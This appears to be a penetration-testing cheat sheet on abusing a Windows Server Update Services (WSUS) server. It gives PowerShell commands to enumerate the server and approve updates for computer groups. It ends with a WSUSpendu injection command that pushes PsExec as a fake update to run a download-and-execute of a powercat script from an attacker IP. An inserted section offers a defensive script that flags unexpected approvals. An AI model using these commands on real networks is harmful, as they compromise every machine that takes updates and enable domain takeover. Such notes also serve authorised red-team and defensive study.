WSUS server abuse

Get all information about the database
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Update Services\Server\setup'

Define $wsus
[reflection.assembly]::LoadWithPartialName("Microsoft.UpdateServices.Administration")
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer()

View updates
$update = $wsus.GetUpdates() | Select -last 1

Get target groups
$wsus.GetComputerTargetGroups()

Approve update
#Pick a group to approve an update for
$group = $wsus.GetComputerTargetGroups() | ? {$_.Name -eq "Domain Servers"}
#Define the actions available for approving a patch
$all = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::All
$install = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Install
$NotApproved = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::NotApproved
$Uninstall = [Microsoft.UpdateServices.Administration.UpdateApprovalAction]::Uninstall
#Approve the update
$update.Approve($install,$group)

Using UpdateServices
import-module -name UpdateServices

Approve the updates
Get-WsusUpdate -Classification All -Approval Unapproved | Approve-WsusUpdate -Action Install -TargetGroupName "All Computers"
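
A defender's counterpart to the approval calls above, as an added example that is not part of the original page: it reads back recent Install approvals through the same administration API and flags those made by an unexpected account or aimed at a sensitive target group. The function names, the allow-listed account, the 7-day window and the sample rows are assumptions made for illustration.

```powershell
# Added example, not from the original page. Account names, the 7-day window
# and the sample rows are constructed assumptions.
function Get-WsusInstallApproval {
    # Collect recent Install approvals from a live server ($Wsus as defined above).
    param($Wsus, [int]$Days = 7)
    $since = (Get-Date).AddDays(-$Days)
    foreach ($u in $Wsus.GetUpdates()) {
        foreach ($a in $u.GetUpdateApprovals()) {
            if ("$($a.Action)" -eq 'Install' -and $a.CreationDate -ge $since) {
                [pscustomobject]@{
                    Title   = $u.Title
                    Group   = $a.GetComputerTargetGroup().Name
                    Admin   = $a.AdministratorName
                    Created = $a.CreationDate
                }
            }
        }
    }
}

function Find-UnexpectedApproval {
    # Flag approvals made by an account outside the allow-list or aimed at a sensitive group.
    param([object[]]$Approval, [string[]]$AllowedAdmin, [string[]]$SensitiveGroup)
    foreach ($a in $Approval) {
        $reasons = @()
        if ($AllowedAdmin -notcontains $a.Admin) { $reasons += 'approver not in allow-list' }
        if ($SensitiveGroup -contains $a.Group)  { $reasons += 'targets sensitive group' }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Title = $a.Title; Group = $a.Group; Admin = $a.Admin
                Created = $a.Created; Reasons = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample rows so the check can be read and run without a WSUS server.
$sample = @(
    [pscustomobject]@{ Title = 'Sample update A'; Group = 'Unassigned Computers'; Admin = 'CORP\wsus-admin'; Created = (Get-Date).AddDays(-1) }
    [pscustomobject]@{ Title = 'Sample update B'; Group = 'Domain Servers'; Admin = 'CORP\jdoe'; Created = (Get-Date).AddHours(-2) }
)
Find-UnexpectedApproval -Approval $sample -AllowedAdmin 'CORP\wsus-admin' -SensitiveGroup 'Domain Servers'

# On the WSUS server itself:
# Find-UnexpectedApproval -Approval (Get-WsusInstallApproval -Wsus $wsus) -AllowedAdmin 'CORP\wsus-admin' -SensitiveGroup 'Domain Servers'
```

With the sample rows, only "Sample update B" is returned, carrying both reasons.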

Abusing WSUS server for domain compromise
Using WSUSpendu.ps1
Wsuspendu.ps1 -Inject -PayloadFile c:\Windows\Temp\PsExec64.exe -PayloadArgs '-accepteula -s -d powershell.exe -c "iex(iwr -UseBasicParsing -Uri http://192.168.100.16/powercat_loaded.ps1)"'